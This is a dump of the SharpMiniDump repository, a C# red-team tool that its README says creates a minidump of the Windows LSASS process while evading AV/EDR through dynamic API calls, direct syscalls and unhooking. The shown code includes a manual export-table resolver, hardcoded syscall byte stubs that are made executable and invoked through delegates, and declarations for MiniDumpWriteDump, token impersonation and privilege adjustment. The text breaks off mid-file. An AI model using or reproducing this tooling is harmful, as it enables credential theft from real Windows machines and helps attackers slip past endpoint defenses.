Repository: b4rtik/SharpMiniDump
Branch: master
Commit: 7129fe8411b7
Files: 11
Total size: 111.9 KB
Directory structure:
gitextract_dn4x7q7a/
├── .gitattributes
├── .gitignore
├── LICENSE
├── README.md
├── SharpMiniDump/
│ ├── CustomLoadLibrary.cs
│ ├── NativeSysCall.cs
│ ├── Natives.cs
│ ├── Program.cs
│ ├── Properties/
│ │ └── AssemblyInfo.cs
│ └── SharpMiniDump.csproj
└── SharpMiniDump.sln
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
# Auto detect text files and perform LF normalization
* text=auto
================================================
FILE: .gitignore
================================================
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Mono auto generated files
mono_crash.*
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# Visual Studio 2017 auto generated files
Generated\ Files/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# Benchmark Results
BenchmarkDotNet.Artifacts/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# JustCode is a .NET coding add-in
.JustCode
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# CodeRush personal settings
.cr/personal
# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Tabs Studio
*.tss
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
# OpenCover UI analysis results
OpenCover/
# Azure Stream Analytics local run output
ASALocalRun/
# MSBuild Binary and Structured Log
*.binlog
# NVidia Nsight GPU debugger configuration file
*.nvuser
# MFractors (Xamarin productivity tool) working folder
.mfractor/
# Local History for Visual Studio
.localhistory/
# BeatPulse healthcheck temp database
healthchecksdb
# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/
================================================
FILE: LICENSE
================================================
BSD 3-Clause License
Copyright (c) 2019, b4rtik
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: README.md
================================================
# SharpMiniDump
Create a minidump of the LSASS process from memory (Windows 10 - Windows Server 2016). The entire process uses: dynamic API calls, direct syscall and Native API unhooking to evade the AV / EDR detection.
SharpMiniDump is a rough port of this project [Dumpert](https://github.com/outflanknl/Dumpert) by [@Cn33liz](https://twitter.com/Cneelis) and you will find the detail in this [post](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/), so BIG credits to him.
Other credits go to [@cobbr_io](https://twitter.com/cobbr_io) and [@TheRealWover](https://twitter.com/TheRealWover) for their work on [SharpSploit](https://github.com/cobbr/SharpSploit) (Execution / DynamicInvoke)
================================================
FILE: SharpMiniDump/CustomLoadLibrary.cs
================================================
//
// Author: B4rtik (@b4rtik)
// Project: RedPeanut (https://github.com/b4rtik/RedPeanut)
// License: BSD 3-Clause
//
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
namespace SharpMiniDump
{
public class CustomLoadLibrary
{
///
/// Resolves LdrLoadDll and uses that function to load a DLL from disk.
///
/// Ruben Boonen (@FuzzySec)
/// The path to the DLL on disk. Uses the LoadLibrary convention.
/// IntPtr base address of the loaded module or IntPtr.Zero if the module was not loaded successfully.
public static IntPtr LoadModuleFromDisk(string DLLPath)
{
Natives.UNICODE_STRING uModuleName = new Natives.UNICODE_STRING();
Natives.RtlInitUnicodeString(ref uModuleName, DLLPath);
IntPtr hModule = IntPtr.Zero;
Natives.NTSTATUS CallResult = (Natives.NTSTATUS)Natives.LdrLoadDll(IntPtr.Zero, 0, ref uModuleName, ref hModule);
if (CallResult != Natives.NTSTATUS.Success || hModule == IntPtr.Zero)
{
return IntPtr.Zero;
}
return hModule;
}
public static IntPtr GetDllAddress(string DLLName, bool CanLoadFromDisk = false)
{
IntPtr hModule = GetLoadedModuleAddress(DLLName);
if (hModule == IntPtr.Zero && CanLoadFromDisk)
{
hModule = LoadModuleFromDisk(DLLName);
if (hModule == IntPtr.Zero)
{
throw new FileNotFoundException(DLLName + ", unable to find the specified file.");
}
}
else if (hModule == IntPtr.Zero)
{
throw new DllNotFoundException(DLLName + ", Dll was not found.");
}
return hModule;
}
///
/// Helper for getting the pointer to a function from a DLL loaded by the process.
///
/// Ruben Boonen (@FuzzySec)
/// The name of the DLL (e.g. "ntdll.dll" or "C:\Windows\System32\ntdll.dll").
/// Name of the exported procedure.
/// Optional, indicates if the function can try to load the DLL from disk if it is not found in the loaded module list.
/// IntPtr for the desired function.
public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false)
{
IntPtr hModule = GetLoadedModuleAddress(DLLName);
if (hModule == IntPtr.Zero && CanLoadFromDisk)
{
hModule = LoadModuleFromDisk(DLLName);
if (hModule == IntPtr.Zero)
{
throw new FileNotFoundException(DLLName + ", unable to find the specified file.");
}
}
else if (hModule == IntPtr.Zero)
{
throw new DllNotFoundException(DLLName + ", Dll was not found.");
}
return GetExportAddress(hModule, FunctionName);
}
///
/// Helper for getting the base address of a module loaded by the current process. This base address could be passed to GetProcAddress/LdrGetProcedureAddress or it could be used for manual export parsing.
///
/// Ruben Boonen (@FuzzySec)
/// The name of the DLL (e.g. "ntdll.dll").
/// IntPtr base address of the loaded module or IntPtr.Zero if the module is not found.
public static IntPtr GetLoadedModuleAddress(string DLLName)
{
ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules;
foreach (ProcessModule Mod in ProcModules)
{
if (Mod.FileName.ToLower().EndsWith(DLLName.ToLower()))
{
return Mod.BaseAddress;
}
}
return IntPtr.Zero;
}
///
/// Given a module base address, resolve the address of a function by manually walking the module export table.
///
/// Ruben Boonen (@FuzzySec)
/// A pointer to the base address where the module is loaded in the current process.
/// The name of the export to search for (e.g. "NtAlertResumeThread").
/// IntPtr for the desired function.
public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
{
IntPtr FunctionPtr = IntPtr.Zero;
try
{
// Traverse the PE header in memory
Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
Int64 pExport = 0;
if (Magic == 0x010b)
{
pExport = OptHeader + 0x60;
}
else
{
pExport = OptHeader + 0x70;
}
// Read -> IMAGE_EXPORT_DIRECTORY
Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
// Loop the array of export name RVA's
for (int i = 0; i < NumberOfNames; i++)
{
String FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
if (FunctionName.ToLower() == ExportName.ToLower())
{
Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
break;
}
}
}
catch
{
// Catch parser failure
throw new InvalidOperationException("Failed to parse module exports.");
}
if (FunctionPtr == IntPtr.Zero)
{
// Export not found
throw new MissingMethodException(ExportName + ", export not found.");
}
return FunctionPtr;
}
}
}
================================================
FILE: SharpMiniDump/NativeSysCall.cs
================================================
//
// Author: B4rtik (@b4rtik)
// Project: SharpMiniDump (https://github.com/b4rtik/SharpMiniDump)
// License: BSD 3-Clause
//
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using static SharpMiniDump.Natives;
namespace SharpMiniDump
{
class NativeSysCall
{
/// 0: 49 89 ca mov r10,rcx
/// 3: b8 0f 00 00 00 mov eax,0x0f
/// 8: 0f 05 syscall
/// a: c3 ret
static byte[] bZwClose10 = { 0x49, 0x89, 0xCA, 0xB8, 0x0F, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
/// 0: 49 89 ca mov r10,rcx
/// 3: b8 0f 00 00 00 mov eax,0x3A
/// 8: 0f 05 syscall
/// a: c3 ret
static byte[] bZwWriteVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x3A, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
/// 0: 49 89 ca mov r10,rcx
/// 3: b8 0f 00 00 00 mov eax,0x50
/// 8: 0f 05 syscall
/// a: c3 ret
static byte[] bZwProtectVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x50, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
/// 0: 49 89 ca mov r10,rcx
/// 3: b8 0f 00 00 00 mov eax,0x36
/// 8: 0f 05 syscall
/// a: c3 ret
static byte[] bZwQuerySystemInformation10 = { 0x49, 0x89, 0xCA, 0xB8, 0x36, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
/// 0: 49 89 ca mov r10,rcx
/// 3: b8 0f 00 00 00 mov eax,0x18
/// 8: 0f 05 syscall
/// a: c3 ret
static byte[] bNtAllocateVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x18, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
/// 0: 49 89 ca mov r10,rcx
/// 3: b8 0f 00 00 00 mov eax,0x1E
/// 8: 0f 05 syscall
/// a: c3 ret
static byte[] bNtFreeVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x1E, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
/// 0: 49 89 ca mov r10,rcx
/// 3: b8 0f 00 00 00 mov eax,0x55
/// 8: 0f 05 syscall
/// a: c3 ret
static byte[] bNtCreateFile10 = { 0x49, 0x89, 0xCA, 0xB8, 0x55, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
///0: 49 89 ca mov r10,rcx
///3: b8 26 00 00 00 mov eax,0x26
///8: 0f 05 syscall
///a: c3 ret
static byte[] bZwOpenProcess10 = { 0x49, 0x89, 0xCA, 0xB8, 0x26, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
public static NTSTATUS ZwOpenProcess10(ref IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid)
{
byte[] syscall = bZwOpenProcess10;
unsafe
{
fixed (byte* ptr = syscall)
{
IntPtr memoryAddress = (IntPtr)ptr;
if (!Natives.VirtualProtect(memoryAddress,
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
{
throw new Win32Exception();
}
Delegates.ZwOpenProcess myAssemblyFunction = (Delegates.ZwOpenProcess)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwOpenProcess));
return (NTSTATUS)myAssemblyFunction(out hProcess, processAccess, objAttribute, ref clientid);
}
}
}
public static NTSTATUS ZwClose10(IntPtr handle)
{
byte[] syscall = bZwClose10;
unsafe
{
fixed (byte* ptr = syscall)
{
IntPtr memoryAddress = (IntPtr)ptr;
if (!Natives.VirtualProtect( memoryAddress,
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
{
throw new Win32Exception();
}
Delegates.ZwClose myAssemblyFunction = (Delegates.ZwClose)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwClose));
return (NTSTATUS)myAssemblyFunction(handle);
}
}
}
public static NTSTATUS ZwWriteVirtualMemory10(IntPtr hProcess, ref IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten)
{
byte[] syscall = bZwWriteVirtualMemory10;
unsafe
{
fixed (byte* ptr = syscall)
{
IntPtr memoryAddress = (IntPtr)ptr;
if (!Natives.VirtualProtect( memoryAddress,
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
{
throw new Win32Exception();
}
Delegates.ZwWriteVirtualMemory myAssemblyFunction = (Delegates.ZwWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwWriteVirtualMemory));
return (NTSTATUS)myAssemblyFunction(hProcess, lpBaseAddress, lpBuffer, nSize, ref lpNumberOfBytesWritten);
}
}
}
public static NTSTATUS ZwProtectVirtualMemory10(IntPtr hProcess, ref IntPtr lpBaseAddress, ref uint NumberOfBytesToProtect, uint NewAccessProtection, ref uint lpNumberOfBytesWritten)
{
byte[] syscall = bZwProtectVirtualMemory10;
unsafe
{
fixed (byte* ptr = syscall)
{
IntPtr memoryAddress = (IntPtr)ptr;
if (!Natives.VirtualProtect(memoryAddress,
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
{
throw new Win32Exception();
}
Delegates.ZwProtectVirtualMemory myAssemblyFunction = (Delegates.ZwProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwProtectVirtualMemory));
return (NTSTATUS)myAssemblyFunction(hProcess, ref lpBaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, ref lpNumberOfBytesWritten);
}
}
}
public static NTSTATUS ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, IntPtr SystemInformation, uint SystemInformationLength, ref uint ReturnLength)
{
byte[] syscall = bZwQuerySystemInformation10;
unsafe
{
fixed (byte* ptr = syscall)
{
IntPtr memoryAddress = (IntPtr)ptr;
if (!Natives.VirtualProtect(memoryAddress,
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
{
throw new Win32Exception();
}
Delegates.ZwQuerySystemInformation myAssemblyFunction = (Delegates.ZwQuerySystemInformation)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwQuerySystemInformation));
return (NTSTATUS)myAssemblyFunction(SystemInformationClass, SystemInformation, SystemInformationLength, ref ReturnLength);
}
}
}
public static NTSTATUS NtAllocateVirtualMemory10(IntPtr hProcess, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect)
{
byte[] syscall = bNtAllocateVirtualMemory10;
unsafe
{
fixed (byte* ptr = syscall)
{
IntPtr memoryAddress = (IntPtr)ptr;
if (!Natives.VirtualProtect(memoryAddress,
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
{
throw new Win32Exception();
}
Delegates.NtAllocateVirtualMemory myAssemblyFunction = (Delegates.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtAllocateVirtualMemory));
return (NTSTATUS)myAssemblyFunction(hProcess, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect);
}
}
}
public static NTSTATUS NtFreeVirtualMemory10(IntPtr hProcess, ref IntPtr BaseAddress, ref uint RegionSize, ulong FreeType)
{
byte[] syscall = bNtFreeVirtualMemory10;
unsafe
{
fixed (byte* ptr = syscall)
{
IntPtr memoryAddress = (IntPtr)ptr;
if (!Natives.VirtualProtect(memoryAddress,
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
{
throw new Win32Exception();
}
Delegates.NtFreeVirtualMemory myAssemblyFunction = (Delegates.NtFreeVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtFreeVirtualMemory));
return (NTSTATUS)myAssemblyFunction(hProcess, ref BaseAddress, ref RegionSize, FreeType);
}
}
}
public static NTSTATUS NtCreateFile10(out Microsoft.Win32.SafeHandles.SafeFileHandle fileHandle,
Int32 desiredAccess,
ref OBJECT_ATTRIBUTES objectAttributes,
out IO_STATUS_BLOCK ioStatusBlock,
ref Int64 allocationSize,
UInt32 fileAttributes,
System.IO.FileShare shareAccess,
UInt32 createDisposition,
UInt32 createOptions,
IntPtr eaBuffer,
UInt32 eaLength)
{
byte[] syscall = bNtCreateFile10;
unsafe
{
fixed (byte* ptr = syscall)
{
IntPtr memoryAddress = (IntPtr)ptr;
if (!Natives.VirtualProtect(memoryAddress,
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
{
throw new Win32Exception();
}
Delegates.NtCreateFile myAssemblyFunction = (Delegates.NtCreateFile)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateFile));
return (NTSTATUS)myAssemblyFunction(out fileHandle,
desiredAccess,
ref objectAttributes,
out ioStatusBlock,
ref allocationSize,
fileAttributes,
shareAccess,
createDisposition,
createOptions,
eaBuffer,
eaLength);
}
}
}
public struct Delegates
{
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int ZwOpenProcess(out IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int ZwClose(IntPtr handle);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int ZwWriteVirtualMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int ZwProtectVirtualMemory(IntPtr hProcess, ref IntPtr lpBaseAddress, ref uint NumberOfBytesToProtect, uint NewAccessProtection, ref uint lpNumberOfBytesWritten);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, IntPtr SystemInformation, uint SystemInformationLength, ref uint ReturnLength);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, ulong FreeType);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int NtCreateFile(out Microsoft.Win32.SafeHandles.SafeFileHandle fileHandle,
Int32 desiredAccess,
ref OBJECT_ATTRIBUTES objectAttributes,
out IO_STATUS_BLOCK ioStatusBlock,
ref Int64 allocationSize,
UInt32 fileAttributes,
System.IO.FileShare shareAccess,
UInt32 createDisposition,
UInt32 createOptions,
IntPtr eaBuffer,
UInt32 eaLength);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool RtlEqualUnicodeString(UNICODE_STRING String1, UNICODE_STRING String2, bool CaseInSensitive);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool RtlGetVersion(ref OSVERSIONINFOEXW lpVersionInformation);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool RtlInitUnicodeString(ref UNICODE_STRING DestinationString, [MarshalAs(UnmanagedType.LPWStr)] string SourceString);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, Microsoft.Win32.SafeHandles.SafeFileHandle hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool OpenProcessToken(IntPtr hProcess, UInt32 dwDesiredAccess, out IntPtr hToken);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int LdrLoadDll(IntPtr PathToFile,
UInt32 dwFlags,
ref Natives.UNICODE_STRING ModuleFileName,
ref IntPtr ModuleHandle);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int NtFilterToken(IntPtr TokenHandle, uint Flags, IntPtr SidsToDisable, IntPtr PrivilegesToDelete, IntPtr RestrictedSids, ref IntPtr hToken);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool RevertToSelf();
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate Boolean ImpersonateLoggedOnUser(IntPtr hToken);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate IntPtr GetCurrentProcess();
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool CloseHandle(IntPtr handle);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool GetTokenInformation(IntPtr TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, IntPtr TokenInformation, UInt32 TokenInformationLength, out UInt32 ReturnLength);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint newprotect, out uint oldprotect);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool LookupPrivilegeValue(String lpSystemName, String lpName, ref LUID luid);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges, ref TOKEN_PRIVILEGES NewState, UInt32 BufferLengthInBytes, ref TOKEN_PRIVILEGES PreviousState, out UInt32 ReturnLengthInBytes);
[SuppressUnmanagedCodeSecurity]
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
